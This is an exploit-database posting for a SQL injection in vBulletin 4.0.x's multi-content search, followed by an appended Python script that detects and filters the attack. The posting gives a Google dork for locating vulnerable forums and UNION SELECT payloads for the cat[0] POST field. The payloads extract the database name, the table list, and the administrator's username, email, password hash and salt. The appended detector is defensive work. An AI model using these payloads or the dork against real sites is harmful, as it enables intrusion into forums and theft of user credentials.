[cc lang=”php”]
>> Exploit database separated by exploit type (local, remote, DoS, etc.)
[+] Site : 1337day.com
[+] Support e-mail : submit[at]1337day.com
#PhilKer – PinoyHack – RootCON – GreyHat Hackers – Security Analyst#
#[+] Discovered By : D4rkB1t
#[+] Site : 1337day.com Inj3ct0r Team
#[+] support e-mail : d4rkb1t@live.com
Product: http://www.vbulletin.com
Version: 4.0.x
Dork : inurl:”search.php?search_type=1″

————————–
# ~Vulnerable Codes~ #
————————–
/vb/search/searchtools.php – line 715;
/packages/vbforum/search/type/socialgroup.php – line 201:203;

————————–
# ~Exploit~ #
————————–
POST data on “Search Multiple Content Types” => “groups”

&cat[0]=1) UNION SELECT database()#
&cat[0]=1) UNION SELECT table_name FROM information_schema.tables#
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#
More info: http://j0hnx3r.org/?p=818

Thanks to my friends from Inj3ct0r Team (1337day.com)

————————–
# ~Advice~ #
————————–
The vendor has already released a patch on vb#4.1.3.
UPDATE NOW!

Use HTTP debugger…
Or please watch this video to understand more: http://www.youtube.com/watch?v=fR9RGCqIPkc

———————

vBulletin 4.X Security Patch

http://www.vbulletin.com/forum/showthread.php/376995-vBulletin-4.X-Security-Patch?AID=804495&PID=564936

[/cc]
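
An added example, not part of the original advisory and not vBulletin's code: every payload above travels in a `cat[N]` POST field that should only ever hold a numeric category id, so this Python check flags search requests whose `cat[]` elements are not plain integers and shows the integer allow-list a handler would apply before the values reach SQL. The request ids, request bodies and the `keywords` field are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Array-style key used by the search form: cat[0], cat[1], ... or cat[]
CAT_KEY = re.compile(r"cat\[[0-9]*\]")
# A category id is expected to be decimal digits only
INT_ONLY = re.compile(r"[0-9]{1,10}")


def suspicious_cat_values(post_body):
    """Return (key, value) pairs whose cat[] element is not a plain integer."""
    hits = []
    # parse_qsl URL-decodes keys and values, so %5B, %29 or '+' cannot hide anything
    for key, value in parse_qsl(post_body, keep_blank_values=True):
        if CAT_KEY.fullmatch(key) and not INT_ONLY.fullmatch(value):
            hits.append((key, value))
    return hits


def clean_cat_ids(post_body):
    """Mitigation side: keep only strictly numeric elements, as integers."""
    return [int(value)
            for key, value in parse_qsl(post_body, keep_blank_values=True)
            if CAT_KEY.fullmatch(key) and INT_ONLY.fullmatch(value)]


def flag_requests(requests):
    """Map request id -> offending cat[] pairs, for requests that have any."""
    return {rid: hits for rid, body in requests
            if (hits := suspicious_cat_values(body))}


# Constructed request bodies (ids and the 'keywords' field are made up)
SAMPLE_REQUESTS = [
    ("req-1", "search_type=1&cat%5B0%5D=3&cat%5B1%5D=12"),
    ("req-2", "search_type=1&cat[0]=1)+UNION+SELECT+database()%23"),
    ("req-3", "search_type=1&cat%5B%5D=12abc"),
    ("req-4", "search_type=1&keywords=union+select"),
]

if __name__ == "__main__":
    for rid, hits in flag_requests(SAMPLE_REQUESTS).items():
        print(rid, hits)
```

Matching on the decoded `cat[]` value rather than on SQL keywords keeps `req-4`, an ordinary keyword search, from being flagged.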
